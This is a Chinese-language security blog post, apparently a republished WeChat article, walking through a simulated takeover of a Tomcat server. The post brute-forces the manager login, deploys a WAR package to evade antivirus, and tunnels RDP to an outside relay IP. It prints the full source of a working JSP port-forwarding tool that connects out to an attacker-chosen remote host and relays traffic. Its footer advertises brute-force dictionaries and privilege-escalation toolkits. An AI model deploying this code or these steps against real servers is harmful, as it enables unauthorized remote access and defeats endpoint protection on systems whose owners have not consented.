通过JSP端口转发拿下服务器权限

通过JSP端口转发拿下服务器权限
2022-7-18 09:0:45 Author: 潇湘信安(查看原文) 阅读量:12 收藏

声明：该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

这篇文章是@欧根亲王号师傅19年投稿发在星球的，经他同意转发至公众号，内容比较基础。

记得他当时是在本地模拟的一个实战场景来做的这个测试实验（绕过安全防护进行端口转发）。

0x01 环境简要

目标主机：Widnows

目标防护软件：Antimalware

目标环境：JSP，Tomcat，Apache

本地主机：Windows、Kali

所需工具：Aapache爆破工具，Lcx，JSP代码，公网IP主机一个

所遇见问题：lcx被杀，webshell被杀

0x02 进攻说明

一、爆破登录口令

爆破Tomcat Web Application Manager，这里不做深入说明，大家都懂的

二、上传webshell

由于服务器上防护软件问题，上传的webshell被杀，lcx工具被杀，这里采取以jsp转发端口的形式来绕过

三、准备jsp页面的war包

使用kali把准备好的jsp页面打包，进入jsp页面目录下执行以下命令打包

jar -cvf aces.war

四、通过已有webshell创建用户名密码

五、通过后台部署war包

六、设置lcx监听本地端口并转发

使用lcx监听本地55并转发到3399端口上

七、访问jsp文件，并设置相关转发参数

参数说明：lip=127.0.0.1lp=需要转发的本地端口rip=公网监听IPrp=公网IP监听的端口号m=转发的模式

0x03 验证

成功登录，自此本次实验结束

0x04 JSP源码

<%@page pageEncoding="GBK"%><%@page import="java.io.*"%><%@page import="java.util.*"%><%@page import="java.nio.charset.*"%><%@page import="javax.servlet.http.HttpServletRequestWrapper"%><%@page import="java.net.*"%><%/*code by KingX*/class KPortTran {  public void listen(String port1, String port2) {    ServerSocket listenServerSocket = null;    ServerSocket outServerSocket = null;    try {      listenServerSocket = new ServerSocket(Integer.parseInt(port1));      outServerSocket = new ServerSocket(Integer.parseInt(port2));    } catch (NumberFormatException e) {
    } catch (IOException e) {    }    Socket listenSocket = null;    Socket outSocket = null;    try {      while (true) {          listenSocket = listenServerSocket.accept();        outSocket = outServerSocket.accept();        new tranThread(outSocket, listenSocket).start();        new tranThread(listenSocket, outSocket).start();        Thread.sleep(200);      }    } catch (Exception e) {      }  }
  public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {    InetAddress src = InetAddress.getByName(srcIP);    InetAddress dest = InetAddress.getByName(targetIP);    int p1 = Integer.parseInt(port1);    int p2 = Integer.parseInt(port2);    new Server(src, p2, dest, p1, true);  }
  public void tran(String srcIP, String port1, String targetIP, String port2)      throws NumberFormatException, IOException {    InetAddress src = InetAddress.getByName(srcIP);    InetAddress dest = InetAddress.getByName(targetIP);    int p1 = Integer.parseInt(port1);    int p2 = Integer.parseInt(port2);    new Server(src, p1, dest, p2, false);  }class tranThread extends Thread {  Socket in;  Socket out;  InputStream is;  OutputStream os;  public tranThread(Socket in, Socket out) throws IOException {    this.is = in.getInputStream();    this.os = out.getOutputStream();    this.in = in;    this.out = out;  }
  private void closeSocket() {    try {      is.close();      os.close();      in.close();      out.close();    } catch (IOException e) {    }  }  @Override  public void run() {    super.run();    byte[] buffer = new byte[4096];    int len = -1;    try {      while (true) {        if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {          break;        } else {          os.write(buffer, 0, len);          os.flush();          }      }    } catch (IOException e) {      closeSocket();    } finally {      closeSocket();    }  }}

class Server extends Thread {  InetAddress src;  InetAddress dest;  int p1, p2;  boolean reverse = false;
  public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,      int targetPort, boolean flag) {    this.src = srcIP;    this.dest = targetIP;    this.p1 = srcPort;    this.p2 = targetPort;    this.reverse = flag;    start();  }
  @Override  public void run() {    super.run();    if (reverse) {      try {        Socket s = new Socket(src, p1);        Socket s2 = new Socket(dest, p2);        new tranThread(s, s2).start();        new tranThread(s2, s).start();
        while (true) {          if (s2.isClosed() || s.isClosed()) {            if (s2.isClosed()) {              s2 = new Socket(dest, p2);            }            if (s.isClosed()) {              s = new Socket(src, p1);            }            new tranThread(s, s2).start();            new tranThread(s2, s).start();          }          Thread.sleep(1000);        }      } catch (IOException e) {      } catch (InterruptedException e) {      }
    } else {      ServerSocket ss;      try {        ss = new ServerSocket(p1, 5, src);
        while (true) {          Socket s = ss.accept();          Socket s2 = new Socket(dest, p2);          new tranThread(s, s2).start();          new tranThread(s2, s).start();        }      } catch (IOException e) {        e.printStackTrace();      }    }  }}}%><%final String localIP = request.getParameter("lip");final String localPort = request.getParameter("lp");final String localPort2 = request.getParameter("lp2");final String remoteIP =request.getParameter("rip");final String remotePort =request.getParameter("rp");final String mode =request.getParameter("m");
KPortTran pt = new KPortTran();if (mode.equals("tran")) {  pt.tran(localIP, localPort, remoteIP , remotePort);}if (mode.equals("slave")) {  pt.slave(localIP, localPort, remoteIP , remotePort);}if (mode.equals("listen")) {  pt.listen(localPort, localPort2);}
%>

关注有礼

关注公众号回复“9527”可以领取一套HTB靶场文档和视频，“1208”个人常用高效爆破字典，“0221”2020年酒仙桥文章打包，“2191”潇湘信安文章打包，“1212”杀软对比源码+数据源，“0421”Windows提权工具包。

还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247496932&idx=1&sn=87d1d9001cae75619a9da11f6112d75e&chksm=cfa550f7f8d2d9e1f6a2519f98452950da1adb2c5c7eb773200660d1f7fb8f71432e9998ecd8#rd
如有侵权请联系:admin#unsafe.sh